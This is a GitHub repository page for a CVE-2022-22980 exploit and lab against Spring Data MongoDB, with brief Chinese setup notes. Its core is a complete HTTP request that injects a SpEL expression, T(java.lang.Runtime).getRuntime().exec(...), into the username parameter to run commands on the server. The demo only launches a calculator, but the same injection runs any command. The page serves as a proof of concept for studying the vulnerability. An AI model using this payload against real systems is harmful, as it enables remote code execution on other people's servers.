Skip to content

jweny/cve-2022-22980

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

docs

docs

 
 

src/main

src/main

 
 

README.md

README.md

 
 

pom.xml

pom.xml

 
 

Repository files navigation

spring-data-mongodb-cve-2022-22980-exp

鸡肋漏洞,只是记录。

  1. 启动redis,27017端口

  2. 启动项目,springboot启动在6666端口

    image-20220622155615142

  3. image-20220622155830238

GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2

参考:

About

CVE-2022-22980 exp && 靶场

Resources

Readme
Activity

Stars

9 stars

Watchers

2 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages